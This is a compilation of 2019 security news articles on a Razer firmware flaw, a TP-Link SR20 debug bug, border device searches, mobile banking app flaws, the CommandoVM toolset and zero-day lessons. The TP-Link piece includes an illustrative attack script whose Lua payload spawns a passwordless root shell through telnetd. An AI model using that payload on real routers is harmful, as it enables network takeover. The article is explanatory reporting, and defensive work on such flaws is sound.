Razer – perfectly happy to sell you a laptop for over $2,000, but when it comes to fixing security holes… tough sh*t

Gaming PC specialist Razer has been singled out for leaving the motherboards in its laptops exposed to a well-known and critical firmware flaw.

Infosec bod Bailey Fox said Razer’s Intel notebook models are still vulnerable to CVE-2018-4251, a security screw-up that potentially allows malware with administrative rights to alter the system’s firmware, thus allowing it to burrow deep into the PC and survive reboots and hard drive wipes. The issue has been known about since last year, and has been patched by other manufacturers, but not, it seems, by Razer.

“Razer has a vulnerability affecting all current laptops, where the SPI flash is set to full read/write and the Intel CPU is left in ME Manufacturing Mode,” Fox explained late last month.

“This allows for attackers to safeguard rootkits with Intel Boot Guard, downgrade the BIOS to exploit older vulnerabilities such as Meltdown, and many other things.”

The CVE-2018-4251 weakness was documented in public last June, after bug-hunters spotted that some Apple machines shipped with Intel’s Management Engine (ME) manufacturing mode left enabled, rather than disabled. System builders are supposed to write their core firmware to the motherboard flash then disable manufacturing mode.

If you have a software nasty on your computer with admin rights, it’s already a game-over situation: the code can spy on you, steal your data, and so on, and your best option is to delete the malware or wipe your storage and start from a clean backup. However, with the ability to write to and bury itself in your motherboard firmware via this left-open mode, the malware could ensure it survives a drive wipe or replacement, and evades detection by antivirus tools.
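
Want to know whether your own machine has been left in this state? Intel’s open-source CHIPSEC framework can check for it. Below is a minimal sketch, and we stress the assumptions: it assumes CHIPSEC is installed (pip install chipsec, plus its helper driver), that its common.me_mfg_mode module supports your platform, and that you run it with admin rights – none of which comes from Fox’s research.

# Minimal sketch: run CHIPSEC's manufacturing-mode check and summarise
# the verdict. Assumes the chipsec package and its helper driver are
# installed and that this script is run with administrative rights.
import subprocess

result = subprocess.run(
    ["chipsec_main", "-m", "common.me_mfg_mode"],
    capture_output=True, text=True,
)

# CHIPSEC modules print PASSED when a check is clean, and FAILED otherwise.
if "FAILED" in result.stdout:
    print("ME Manufacturing Mode appears to be ENABLED - firmware at risk")
elif "PASSED" in result.stdout:
    print("ME Manufacturing Mode appears to be disabled")
else:
    print("Could not determine the state; raw CHIPSEC output follows:")
    print(result.stdout)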

Such was the worry in October of last year when Apple moved to issue a security update to close the vulnerability in its gear.

If Fox is to be believed, and there is no reason to doubt the researcher, then Razer machines would be left open to similar types of attack. What’s worse, Fox claims to have been in contact with Razer, only to have the company decline to acknowledge and put out a fix for the issue.

The Register asked Razer for its side of the story, but at the time of publication we have yet to hear back from the gaming hardware giant.

In the meantime, gamers should be wary of attacks, but there is no reason to panic.

As we already stated, exploiting this bug would require the aggressor to have local admin-level access to the machine, and if a miscreant is running privileged code on your PC, there are about a thousand other things you’ll want to worry about before considering the integrity of your mobo firmware. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/04/03/razer_laptop_flaw/

TP-Link router zero-day offers your network up to hackers

Just last week, we talked in the Naked Security podcast about what you can do if you’re stuck with a router with security holes that you can’t easily fix.

One way this can happen is if your ISP won’t let you connect at your end unless you use a router provided by them.

These “forced routers” are typically locked down so you can’t update them yourself, and may even have remote access permanently enabled so that your ISP can wander in at will.

Our recommendation, when you’re faced with someone else’s router in your own home, is simply to treat it as if it were miles away at the other end of your phone line or cable connection, back in the ISP’s data centre or the phone company’s local exchange where you can’t see it.

Buy a second router (or get yourself the free Sophos XG Firewall Home Edition), plug the ISP’s router LAN (internal) port into the WAN (external) port of the device you look after yourself, and pretend the ISP’s equipment doesn’t exist.

Don’t bother with the Wi-Fi and firewall parts of the ISP’s router – just treat it as a straight-up modem that interconnects your home ethernet network with the phone, cable or fibre network used by your ISP.

Unfortunately, this router-inside-a-router approach isn’t always a viable one.

Here’s an example of when that solution breaks down: a Google security developer just released details of a bug in a type of home router that’s specifically designed to integrate with your home automation kit, and is therefore supposed to be your innermost router anyway.

The bug was found in the TP-Link SR20 router, a device that would be pointless to own if you chained it through another router to shield your own network from it.

In other words, your main reason for having an SR20 would be to set it up at the core of your home network, where it could work with your TP-Link “smart home” kit such as light bulbs, plugs and cameras, as well as interact with TP-Link’s special mobile app, Kasa.

Kasa is a pun: casa is the Latin word for what Germanic languages such as English, Dutch and Swedish call a house/huis/hus, and it is still used to mean house in many Romance languages, including Portuguese, Spanish, Italian and Romanian.

Fortunately, this TP-Link vulnerability isn’t remotely exploitable – by default, at least – so SR20 routers aren’t automatically exposed to attack from anyone out there on the internet.

But the bug itself is nevertheless serious, and is a handy reminder of what can go wrong when developers allow themselves to get stuck in (or at least, stuck with) the past, supporting old and insecure code alongside the latest, more secure version.

How did the bug come about?

The SR20 supports a proprietary protocol used by TP-Link for debugging.

Debug interfaces on hardware devices are often problematic, because they usually exist so that developers or support staff can get a detailed look into the guts of a unit, and extract (and sometimes modify) information and settings that would normally be protected from tampering.

Interestingly, one of the earliest internet viruses, the so-called Morris Worm of 1988, was able to spread thanks to a debug feature in the popular mail server sendmail.

This feature wasn’t supposed to be enabled on production servers, but many administrators simply forgot to turn it off.

The sendmail debug setting instructed the server to treat specially constructed emails not as messages but as a list of system commands to run automatically.

You could, quite literally, email a remote server a message that ordered it to infect itself, whereupon it would try to mail itself to the next guy, and so on, all without a password.

Well, for TP-Link SR20 owners, it’s 1988 all over again, although an attacker does need a foothold inside your network already.

Living with the past

Simply put, this bug involves what’s known in the jargon as a downgrade attack.

Apparently, early TP-Link routers would happily carry out debug commands for anyone who could send network packets to the LAN side of the router – you could access the debugging functions without ever supplying or even knowing a password.

That weakness was apparently patched by introducing a new set of “version 2” debug commands that only work if you know and provide the administrator password – a reasonable precaution that limits admin-level activity to admin-level users.

According to Google researcher Matthew Garrett, however, you can still persuade the router to accept some dangerous version 1 commands without needing a password at all.

You just ask the router nicely to fall back to the old days, before passwords were deemed necessary for debugging.

The buggy command in this case is number 49, known rather benignly as CMD_FTEST_CONFIG.

You’d hope that a command that did any sort of configuration test would, at worst, report whether the test passed or failed – but this command is much more general than that.

How does the bug work?

Garrett decompiled the relevant part of the debug server in TP-Link’s firmware and found that CMD_FTEST_CONFIG works roughly like this:

  • You send the server a file_name and some arbitrary additional_data.
  • The server connects back to your computer using TFTP (trivial file transfer protocol) and downloads the file called file_name.
  • The server assumes that the data it just downloaded is a Lua program that includes a function called config_test().
  • The server loads the supplied Lua program, and calls the function config_test() with your additional_data as an argument.
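
To make that flow concrete, here’s a rough sketch of the attacker’s side of the exchange. To be clear, this is not Garrett’s actual proof-of-concept: the command number 49 comes from his write-up, but the LAN address, port number and packet framing below are simplified guesses for illustration, and the payload command is just an example.

# Illustrative sketch only - the framing here is invented for readability,
# NOT TP-Link's real debug protocol format. Command number 49
# (CMD_FTEST_CONFIG) is from the write-up; everything else is assumed.
import socket

ROUTER = "192.168.0.1"   # assumed LAN address of the SR20
DEBUG_PORT = 1040        # assumed port of the debug service

# The Lua payload the router will fetch from us over TFTP. The function
# name config_test() is dictated by the router's debug code; the command
# it runs is merely one example of "anything you like, as root".
PAYLOAD_LUA = """
function config_test(additional_data)
  os.execute('telnetd -l /bin/sh')  -- spawn a passwordless root shell
end
"""

with open("payload.lua", "w") as f:  # serve this directory with any TFTP server
    f.write(PAYLOAD_LUA)

# Ask the router - no password required - to TFTP payload.lua back from us,
# load it into its root-privileged Lua interpreter, and call config_test().
request = bytes([49]) + b"payload.lua;some-additional-data"
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(request, (ROUTER, DEBUG_PORT))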

Lua is a free, open source, lightweight scripting language from Brazil that is used in many popular security products including Wireshark and Nmap, and widely found in routers on account of its tiny footprint.

The TP-Link debug server runs as root – the Linux equivalent of the Windows SYSTEM and Administrator accounts combined – so its Lua scripting engine is running as root, so your supplied program is running as root, so your config_test() function runs as root, so you pretty much get to do whatever you like to the router.

The bad news here is that even if an attacker doesn’t know much about Lua, the language itself includes a built-in function called os.execute() that does exactly what its name suggests…

…and runs an operating system command of your choice.

Lua also has the handy function io.popen() that runs a system command, collects the output and returns it back to the program so that you can figure out what to do next.

-- Example Lua code to run a system command 
-- and retrieve the answer line by line...

uidcmd = io.popen('id -u')
getuid = uidcmd:lines()
if getuid() == '0' then
  print 'You are root!'
end

-- or simply...

if io.popen('id -u'):lines()() == '0' then print 'You are root!' end

In short, anyone who can send network traffic to the LAN ports on your router can pretty much control your network.

If your Wi-Fi is password protected, an attacker will need to know the Wi-Fi key (the one that’s typically written on the wall of the coffee shop), but that’s all – they won’t need the router password as well.

What happened next?

The bad part of this story is that Garrett says he never received any feedback from TP-Link after contacting the company via what seems to be its official Security Advisory page.

According to TP-Link:

Security engineers and other technical experts can [use this form] to submit feedback about our security features. Your information will be handled by our network security engineers. You will receive a reply in 1-3 working days.

But Garrett says that a reply never arrived; he tried to follow up via a message to TP-Link’s main Twitter account, but still received no response.

Because his original report was made in December 2018, Garrett has now gone public with his findings, following Google’s policy that 90 days ought to be enough time for a vendor to deal with a security issue of this sort.

You might think it’s a bit casual to use Twitter as a medium for a formal notification that says, “Dear Vendor, the official bug disclosure clock is ticking and you have 90 days or else,” but, as Garrett found, TP-Link’s official security feedback page offers no way to stay in touch other than to give the company your own email address and wait for a reply.

What to do?

  • If you’re part of the TP-Link security team, you probably want to acknowledge this issue and announce a date by which you can fix it, or at least provide a workaround. It feels as though simply turning off (or providing an option to turn off) unauthenticated access to the debugging server would be a quick fix.
  • If you’re a programmer, don’t run servers as root. Code that accepts data packets from anywhere on the network shouldn’t be processing those packets as root, just in case something goes wrong – there’s a short sketch of this after the list. If crooks find a vulnerability in your network code and figure out an exploit, why hand them root-level powers at the same time?
  • If you own an affected router, be aware that anyone you allow onto your Wi-Fi network can probably take it over rather easily using Garrett’s proof-of-concept code. In particular, if you run a coffee shop or other shared space, avoid using an SR20 for your free Wi-Fi access point.
  • Whichever brand of router you have, go into the administration interface and check your Remote access setting. At home, you almost never need or want to let outsiders see the inside of your network, so make sure that remote access is off unless you are certain that you need it.
  • If you are an IT vendor with an official channel for receiving bug reports, take care not to let any of them slip between the cracks. Provide a clear channel for future communications, such as a dedicated email address, where researchers can follow up if necessary.
  • If you’re in the marketing department and you see a technical message in your Twitter feed, find the right person to talk to inside the company and pass the message on. Don’t make it hard for people who are trying to help you.
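
On the “don’t run servers as root” point above, the defence is old and well understood: acquire any privileged resources first, then drop to an unprivileged account before parsing a single byte of untrusted input. Here’s a minimal sketch for a Unix-like system – the port and the account name nobody are examples, not anything from TP-Link’s code:

# Minimal sketch of privilege dropping in a network server: bind the
# privileged port while still root, then permanently switch to an
# unprivileged user before handling any data. Unix-only.
import os
import pwd
import socket

srv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
srv.bind(("0.0.0.0", 69))    # ports below 1024 need root to bind

unpriv = pwd.getpwnam("nobody")
os.setgroups([])             # shed supplementary groups first
os.setgid(unpriv.pw_gid)     # then drop the group ID...
os.setuid(unpriv.pw_uid)     # ...then the user ID - root is now gone for good

# From here on, a bug in the packet handling hands an attacker far less.
data, peer = srv.recvfrom(4096)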

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/HaRWjJsBaeg/

Mystery of the Chinese woman who allegedly tried to sneak into Trump’s Mar-a-Lago with a USB stick of malware

A Chinese woman was caught sneaking into President Trump’s Mar-a-Lago country club with a thumb drive of malware, it was claimed yesterday.

Yujing Zhang, 32, was collared after possibly trying to slip into a bash at the swanky resort promoted by Li “Cindy” Yang, the former massage parlor boss who denies allegations she sold access to the president and his family.

Zhang had on her a thumb drive containing some unknown malware, plus four cellphones, a laptop, and an external storage drive, when she was nabbed by the US Secret Service, it was claimed.

The software nasty could, of course, be run-of-the-mill crap that accidentally ended up on the USB stick, rather than some sort of scary spyware that was part of a deliberate plot to bug computers at Mar-a-Lago. We’ll probably find out soon enough: Zhang was charged [PDF] on Monday with making false statements to a federal officer, and entering restricted property.

It’s claimed Zhang, on March 30, tried to enter the president’s exclusive club in southern Florida by telling US Secret Service agents manning the gates that she wanted to use the pool, although she had no swimsuit.

When the g-men told her she wasn’t on the access list, a resort manager suggested she was the daughter of a member, to which Zhang gave an ambiguous nod, it was claimed – the agents suspected a language barrier was preventing her from fully explaining her situation.

And so, with that, a valet was allowed to pick her up and drive her in through the grounds on a golf cart, it is claimed. However, Zhang couldn’t say where exactly she wanted to go, and was dropped off at the reception desk, it is alleged.

There, she tried to claim she was attending a United Nations Chinese American Association conference, an event that wasn’t scheduled, it was alleged, and was swiftly frogmarched off the property. She may have been referring to an event at the country club Yang earlier promoted on Chinese-language social media.

Zhang next explained to Secret Service agents that a friend called Charles she met online had asked her to fly from Shanghai, China, to Palm Beach, and find and speak to President Trump’s inner circle about Chinese and American biz relations, we’re told. That “Charles” may be Charles Lee, a Chinese event promoter who previously worked with Yang.

The g-men noted Zhang had no problem reading and speaking English.

She was cuffed and charged, and is due to appear in court on April 8. Her lawyer, public defender Robert Adler, declined to comment. If convicted, she faces up to five years in the clink and fines of up to $350,000.

There is no indication she is in any way connected to Yang or Lee, nor that she got anywhere close to the president, who was staying at the club with his family that weekend. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/04/02/trump_china_malware_usb_stick/

Ex-Mozilla CTO: I was grilled for three hours at San Francisco airport by US border cops – and I’m an American citizen

Former Mozilla CTO Andreas Gal says he was interrogated for three hours by America’s border cops after arriving at San Francisco airport – because he refused to unlock his work laptop and phone.

Gal, now employed by Apple, today claimed he was detained and grilled on November 29 after landing in California following a trip to Europe.

He had attempted to pass through US customs via a Global Entry electronic kiosk. He wasn’t expecting a problem, since the Hungarian-born techie is now an American citizen, but it was not to be.

“On this trip, the kiosk directed me to a Customs and Border Patrol agent who kept my passport and sent me to secondary inspection,” Gal said. “There I quickly found myself surrounded by three armed agents wearing bullet proof vests. They started to question me aggressively regarding my trip, my current employment, and my past work for Mozilla, a non-profit organization dedicated to open technology and online privacy.”

Gal said the g-men were rather interested in his time at Firefox-maker Mozilla, and in his recent trip to Canada. They also went through his wallet and luggage, and this led to a request by the agents for Gal to unlock his Apple-issued iPhone XS and MacBook Pro, it is claimed.

Given the devices were emblazoned with big red stickers reading “PROPERTY OF APPLE. PROPRIETARY,” and he had signed confidentiality agreements with Cupertino, Gal said he asked for permission to call his bosses and/or a lawyer to see if he would get into trouble by handing over access. When this request was repeatedly refused, we’re told, he clammed up, taking the Fifth, and citing constitutional rights against unwarranted searches.

Irked by Gal’s refusal, it is claimed, the border agents told him he had no constitutional nor any legal protections, and threatened him with criminal charges should he not concede to the search. He said he was eventually allowed to leave with his belongings, the devices still locked, and no charges were pressed. Gal said the agents did take away his Global Entry pass, which allows express entry through customs, as punishment for not complying with their demands.

How random is random?

Gal believes the ordeal was not a random search gone awry, but rather a targeted attempt by the government to send a message. Certainly, more and more security researchers report being grilled by US border patrol – if they can even get a visa to enter the country, that is.

“My past work on encryption and online privacy is well documented, and so is my disapproval of the Trump administration and my history of significant campaign contributions to Democratic candidates,” Gal noted. “I wonder whether these CBP [Customs and Border Patrol] programs led to me being targeted.”

Now, Gal has enlisted the help of the ACLU to probe the brouhaha and determine whether his civil rights were violated. The civil-liberties watchdog has filed a complaint [PDF] with the Department of Homeland Security, arguing that the search violated the US Constitution and demanding an investigation into whether the CBP’s entry policies are illegal.

“CBP’s baseless detention and intrusive interrogation of Andreas Gal and the attempted search of his devices violated his Fourth Amendment rights,” ACLU Northern California senior counsel William Freeman said of the complaint.

“Furthermore, CBP’s policies lack protections for First Amendment rights by allowing interrogation and device searches that may be based on a traveler’s political beliefs, activism, nation of origin, or identity.”

“As a matter of policy CBP can’t comment on pending litigation,” CBP told The Register. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/04/02/us_customs_mozilla_cto/

Major Mobile Financial Apps Harbor Built-in Vulnerabilities

A wide variety of financial services companies’ apps suffer from poor programming practices and unshielded data.

Mobile apps for financial services are an important part of many consumers’ financial lives, yet those apps are suffering a “vulnerability epidemic,” according to a new report.

The report, commissioned by Arxan and produced by the Aite Group, looks at the perceived security of mobile financial apps versus the reality. And in many cases, to quote a movie title from 1994, “Reality Bites.”

The report is based on research that decompiled the apps to their original source code for vulnerability assessment. For many of the apps, that step started the list of vulnerabilities, since application shielding should prevent threat actors from decompiling an application to do their own vulnerability assessment.

“Mobile apps in general lack the necessary security features to protect users’ data. Even with social engineering and mobile breaches occurring more often, app developers still are not developing apps with security in mind,” says Timur Kovalev, chief technology officer at Untangle.

Because the apps come from trusted financial institutions, consumers begin with the assumption that they are secure. “While users are comfortable using mobile apps for nearly anything and everything these days, the concerns for securing their money and financial information can make nearly anyone a little hesitant. And maybe with good reason,” says Nathan Wenzler, senior director of cybersecurity at Moss Adams, a Seattle-based accounting, consulting, and wealth management firm.

Wenzler points out that the players in the market are broadly divided between traditional financial institutions, which are known for their legacy of security but often have woefully little experience with agile app development, and newer online financial institutions, which have less experience with the regulatory and security requirements of the financial sector but have access to modern secure development methods.

Those differences in experience and expertise are borne out in the critical vulnerabilities found in the mobile apps: Retail banking apps have the greatest number of critical vulnerabilities, while the greatest number of severe findings came from auto insurance apps, which contained the most hard-coded private keys, API keys, and secrets in their code.

Other common vulnerabilities found in code across all sectors are hard-coded SQL statements and hard-coded private certificates that a threat actor could easily replace and code around.
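
To see why hard-coded secrets are such low-hanging fruit, remember that an unshielded Android app is just a ZIP archive: even without a full decompiler, a few lines of script can trawl one for likely keys. A rough sketch – the file name and the patterns are illustrative, not taken from the report:

# Rough sketch: scan an APK (a ZIP archive) for strings that look like
# hard-coded secrets. File name and regex are illustrative only.
import re
import zipfile

SECRET_HINTS = re.compile(
    rb"(api[_-]?key|secret|password|BEGIN( RSA| EC)? PRIVATE KEY)[ =:'\"]{0,4}[!-~]{0,60}",
    re.IGNORECASE,
)

with zipfile.ZipFile("banking-app.apk") as apk:  # hypothetical app file
    for name in apk.namelist():
        for hit in SECRET_HINTS.finditer(apk.read(name)):
            print(name, hit.group(0)[:80])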

The most secure mobile financial apps are those of banks that offer and service health savings accounts (HSAs), followed by health insurer mobile payment apps and credit card issuers. Whether their apps are on the more or less vulnerable end of the scale, Wenzler says that institutions across the industry know they must improve application security. “No matter who is providing the financial services, everyone [in the industry] realizes what’s at stake when it comes to their customers and their finances.”

Kovalev says that financial services companies should improve the security performance of their own development organizations while working with other organizations to boost security even further. “It is critical that developers start taking app security seriously and that app stores like Google Play Store and Apple App Store enforce stricter security standards for apps that have access to such sensitive data,” he says.

Wenzler is adamant that a failure to improve mobile financial app security could have huge consequences for banks and financial services companies. “Unlike many non-financial businesses, these banks won’t recover as easily from a breach of trust over their customer’s finances,” he says. And those financial services firms supporting mobile applications have a huge challenge in front of them, Wenzler says, since most start from a position of relative insecurity.

“Making application security an integral part of the development and DevOps processes is critical to creating confidence within the customer base that their money and information is secure, no matter how they choose to manage their banking tasks,” he says.

Article source: https://www.darkreading.com/application-security/major-mobile-financial-apps-harbor-built-in-vulnerabilities/d/d-id/1334321?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

FireEye Creates Free Attack Toolset for Windows

The security services company releases a distribution of 140 programs for penetration testers who need to launch attacks and tools from an instance of Windows.

Kali Linux has become the standard tool for offensive security specialists, but for penetration testers who need native Windows functionality, there has not been a similarly maintained set of tools.

Security service firm FireEye aims to change that. The company released a collection of more than 140 open-source tools for Windows on March 28 that give red-team penetration testers and blue team defenders a curated collection of the top reconnaissance and exploitation programs. Dubbed Complete Mandiant Offensive Virtual Machine, or CommandoVM, the toolset allows security researchers to have a go-to Windows environment for offensive operations, says Jake Barteaux, a consultant for FireEye’s Mandiant and a co-creator of the toolset.

“Almost every penetration tester that I have worked with has their own version of a Windows machine that they use during internal pen tests,” he says. “Having that Windows machine is standard tradecraft for a lot of penetration testers. A lot of them will install many of the same tools that are included in Commando, but there hasn’t ever been a standard toolset for Windows testing.”

Toolset distributions for penetration testers solve two major problems. The first is finding the best penetration testing tools. Released in 2013, Kali Linux has some 600 security, reconnaissance and exploitation tools in its distribution, according to Offensive Security, the certification and training group behind the free distribution. CommandoVM contains many of the same tools, some of which work natively on a Windows machine inside a corporate network.

“They can use the VM as a staging area,” Barteaux says. “A lot of times, getting a beacon or getting some sort of command-and-control foothold on their own personal virtual machine allows them to pivot into the network easier.”

The second major problem for penetration testers is maintenance of their toolset, he says. Packaging up the programs in a distribution also allows for faster maintenance, making patching and updating easier. Kali Linux started out as a distribution that received occasional updates; now the toolset is a rolling distribution with updates multiple times a day.

Red team exercises, also known as penetration testing, allow companies to use employees or consultants to test their network and systems security. While automated scanning will often find issues, penetration testing allows security specialists to focus on digging deeper into potential vulnerabilities. In addition, such activities can help incident responders—blue teams—react more quickly and more knowledgeably to threats.

CommandoVM is based on FireEye’s FLARE VM platform for malware analysis and application reverse engineering. The distribution includes a variety of tools commonly used by offensive security testers, including the programming languages Python and Go, the network mapper Nmap and the packet analyzer Wireshark, web-security testing frameworks such as Burp Suite, and Windows security tools such as Sysinternals and Mimikatz.

“We tried to make the tools easy for junior red teamers to pick up and [use] right away,” Barteaux says. “Another goal of mine in creating it was to create a toolset that even senior red teamers might be able to use. It would be a good way to train people.”

While Kali Linux has become the de facto penetration tester toolset in the past six years, there are times when a pen tester needs Windows, he says.

“Especially when you are red team-focused, you will not have a Linux machine sitting on the network that you can install Kali on,” Barteaux says. “You are going to pivot through a Windows machine on the network.”

A common attack, for example, is to use CommandoVM inside an Active Directory deployment as a beachhead into the network, allowing reconnaissance, credential attacks and other authentication-based compromises. In an example attack using the toolset, FireEye demonstrated identifying a web server running Jenkins, using Burp Suite to brute-force the login credentials and gain privileged execution on the server.
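
The first step of that kind of attack – simply finding the Jenkins server – is the sort of job the bundled tools handle. Here’s a sketch using Nmap, which is on CommandoVM’s tool list; the subnet and ports are examples, and this merely wraps the ordinary nmap command line:

# Sketch: sweep a subnet for web services that might be Jenkins, using
# the nmap binary on the PATH. Subnet and ports are examples only.
import subprocess

scan = subprocess.run(
    ["nmap", "-p", "8080,8443", "--open", "-sV", "10.0.0.0/24"],
    capture_output=True, text=True,
)

for line in scan.stdout.splitlines():
    # Jenkins commonly self-identifies in service banners, often via Jetty.
    if "Jenkins" in line or "Jetty" in line:
        print(line)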

The CommandoVM distribution can be downloaded for Windows 7 or Windows 10 from GitHub. A list of all the tools in the distribution can be found in the GitHub README file.

Article source: https://www.darkreading.com/vulnerabilities---threats/fireeye-creates-free-attack-toolset-for-windows-/d/d-id/1334318?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

War on Zero-Days: 4 Lessons from Recent Google & Microsoft Vulns

When selecting targets, attackers often consider total cost of ‘pwnership’ — the expected cost of an operation versus the likelihood of success. Defenders need to follow a similar strategy.

Recently, two in-the-wild exploits for zero-day vulnerabilities in Google Chrome and Microsoft Windows were disclosed by Google’s TAG (Threat Analysis Group). The event made headlines, but it’s not a new story: a zero-day vulnerability under active attack is discovered, vendors scramble to issue patches and companies scramble to deploy these patches. Substantial cost is incurred each step of the way. (For reference, Google patched the Chrome zero-day [CVE-2019-5786] and Microsoft patched the Windows 7 zero-day [CVE-2019-0808].)

The bad news is we’ve been doing this dance for decades. The good news is that some pockets of the industry have invested significant time and energy into reducing the impact and frequency of attacks that leverage zero-day vulnerabilities. In fact, Google and Microsoft are among the leaders in this space.

What can software companies that lack the security budget of tech titans learn from this latest event, and what can IT managers/CISOs/enterprise decision makers learn to inform product decisions? Here are four strategies to consider:

Software Developers: Adopt a Healthy Skepticism of Unsafe Languages
Unsafe languages (C, C++, Objective-C) are unsafe. There are various definitions of safe, of course, but the C language family doesn’t qualify for any of them. Treat unsafety for what it is: cost, risk and liability. Consider Rust or Go among a range of alternatives.

On the surface, it may appear cheaper to develop in a language that’s perhaps more familiar, but you need to consider the total cost of ownership (TCO) of that choice. If you want to use an unsafe language to build a safe product, you’ll need to invest in exhaustive unit tests, handle any current and future undefined behavior, accommodate cross-platform differences, and maintain a fuzzing suite – at a minimum. Like Google and Microsoft, you’ll need processes in place for when all these things fail to identify an issue – and they will.
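
For a flavour of what “maintain a fuzzing suite” means in practice, here is the general shape of a coverage-guided fuzz harness. It uses Google’s Atheris fuzzer for Python purely as an illustration (our choice, not a tool the article names); a libFuzzer or AFL harness for C or C++ has the same structure: feed bytes in, crash loudly on bugs.

# Shape of a fuzz harness, using Google's Atheris (pip install atheris).
# json.loads stands in for whatever parser you need to hammer.
import sys

import atheris

with atheris.instrument_imports():
    import json

def TestOneInput(data):
    try:
        json.loads(data)  # the code under test
    except ValueError:    # cleanly rejecting malformed input is fine
        pass

atheris.Setup(sys.argv, TestOneInput)
atheris.Fuzz()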

If you’re starting a new project, there are very few compelling reasons to build in an unsafe language. Reasons typically given include:

  • Project performance is critical and even minimal overhead is unacceptable,
  • The platform does not support a safe language, and
  • The project will never handle untrustworthy input.

The cost gap of the first two is closing daily and the last is undecidable. It’s unlikely, for example, that the developers of Ghostscript anticipated untrustworthy input via thumbnail processes in Gnome.

If you’re maintaining an existing unsafe-language project, consider piecemeal conversion of that codebase to a safe language. Mozilla has been doing just that with Firefox, rewriting various unsafe-language portions of the browser in Rust.

Enterprises: Don’t Use Outdated (Even if Supported) Operating Systems
What does it cost to upgrade your enterprise from Windows 7 to Windows 10? This can be difficult to quantify. What is perhaps even more difficult to quantify is the value gained from a modern operating system — but both are equally important for calculating an accurate TCO.

The aforementioned zero-day exploit in Windows made use of a null pointer dereference vulnerability in win32k.sys. This class of vulnerability is not exploitable on Windows 8 and later, and Windows 10 provides additional controls to app developers that substantially reduce the attack surface of this module. Continuing to run an outdated operating system comes with a security cost.

You can’t patch your way to security, yet patches are typically all you get with an outdated operating system. Windows isn’t alone here; macOS and Linux also ship new exploit mitigations, and fix existing ones, with each release. By running outdated software, you don’t reap these benefits.

Software Engineers: Know Your Attack Surface
Zero-day vulnerabilities in widely deployed software are worth money – sometimes a substantial amount of money. Gone are the days when security researchers dropped zero-days on infosec conference attendees. The meat of many presentations at today’s offensive-oriented conferences is the exploration of previously unknown, unexplored attack surfaces in commodity software.

You need to identify all the ways your product might interact with untrustworthy input — your attack surface. Intended use cases are the tip of the iceberg. Some of the best value you could get out of a third-party audit is to learn new ways of interacting with your software.

Software Developers: Identify, Track, and Sandbox Untrustworthy Input
Once you’ve mapped out your attack surface, track and contain the usage of that untrustworthy input – and consider sandboxing the code responsible for handling it. The Chromium developers (including Google) have done an excellent job of describing Chrome’s (that is, Chromium’s) sandbox design. Use this as inspiration: build directly on it (the code is very liberally licensed) or use Google’s just-released Sandboxed API. Adobe built on Chromium’s sandbox almost a decade ago, reducing the impact of PDF parsing vulnerabilities in Adobe Reader. If in doubt, consult Chromium’s Rule of 2.

Both: If You Must Run/Develop Unsafe-Language Code, Use Exploit Mitigations
If your software product is locked into an unsafe language, there is no excuse to not leverage exploit mitigations offered by your compiler and target operating system.

Valve’s Steam (think iTunes for games) contained multiple vulnerabilities that attackers leveraged to install malware on players’ machines. In a separate report, Steam was shown to be vulnerable to a classic stack-based buffer overflow in the way it parsed game information. Exploitation was made simple by the lack of stack protection, a mitigation that has been available in various forms for over a decade. Don’t be like Valve.

Exploit mitigations are no substitute for choosing to develop in a safe programming language. If you must maintain or develop in an unsafe language, enable them as a matter of course, but do not rely on them as a reason to delay moving to a safe language. If you’re responsible for deploying software, use the exploit mitigations available to you.
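
On the deployment side, it’s worth verifying that the mitigations you expect are actually present in the binaries you run. Here’s a rough, checksec-style sketch for Linux ELF binaries using the pyelftools library – the file name is hypothetical, and dedicated tools such as checksec do this far more thoroughly:

# Rough sketch: check a Linux ELF binary for two common mitigations,
# using pyelftools (pip install pyelftools). The path is hypothetical.
from elftools.elf.elffile import ELFFile

with open("./game-server", "rb") as f:
    elf = ELFFile(f)

    # Stack canaries leave a reference to __stack_chk_fail in the
    # dynamic symbol table.
    dynsym = elf.get_section_by_name(".dynsym")
    names = {s.name for s in dynsym.iter_symbols()} if dynsym else set()
    print("stack protector:", any("__stack_chk" in n for n in names))

    # A non-executable stack shows up as a PT_GNU_STACK segment without
    # the execute flag (PF_X == 1) set.
    nx = any(seg["p_type"] == "PT_GNU_STACK" and not (seg["p_flags"] & 1)
             for seg in elf.iter_segments())
    print("non-executable stack:", nx)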

When selecting targets, attackers often consider total cost of “pwnership” — the expected cost of an operation versus the likelihood of success (times expected value) As a defender or a software engineer, conduct the same analysis — and consider the way your choices affect the security of software development and deployment.

Article source: https://www.darkreading.com/application-security/war-on-zero-days-4-lessons-from-recent-google-and-microsoft-vulns/a/d-id/1334289?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Women Now Hold One-Quarter of Cybersecurity Jobs

New data from (ISC)2 shows younger women in the field are making more money than women in previous generations – but overall gender pay disparity persists.

Women now actually make up 24% of the cybersecurity workforce – a seismic shift from the perennially static 11% figure of the past six or more years. But this new data point, revealed today by (ISC)2, comes with a caveat: it now counts women in IT whose daily jobs entail security responsibilities.

(ISC)2 retooled its survey data this year to include men and women in IT jobs where at least 25% of their day encompasses security tasks and issues, to better reflect the scope of the job sector. That means it’s difficult to infer from the new (ISC)2 data whether there has been significant growth in the number of women cybersecurity professionals, or whether women without cybersecurity-related job titles had merely gone uncounted in past surveys by (ISC)2 and other organizations.

Cybersecurity Ventures said in a study last year that women would make up over 20% of the overall cybersecurity market by the end of 2019.

While one-fourth still represents a relatively low ratio of women to men, the study shows a clear female youth movement in security: Millennial women now make up 45% of the women in the industry, while Millennial men account for 33% of the men. That’s a shift from Generation X, which accounts for 25% of the women and 44% of the men in cybersecurity.

Mary-Jo de Leeuw, (ISC)2 director of cybersecurity advocacy for the EMEA region, says the uptick in younger women entering the cybersecurity field stems from a cultural change as well as earlier exposure to technology and the presence of female role models in tech.

“They grew up in a digital world” and come from a culture where the Internet permeates their lives, according to de Leeuw, who has been involved with various organizations promoting cybersecurity skills and training for women and girls. “They’re used to being part of all cyber things around them, so they can also focus on being part of cybersecurity and part of the digital world.”

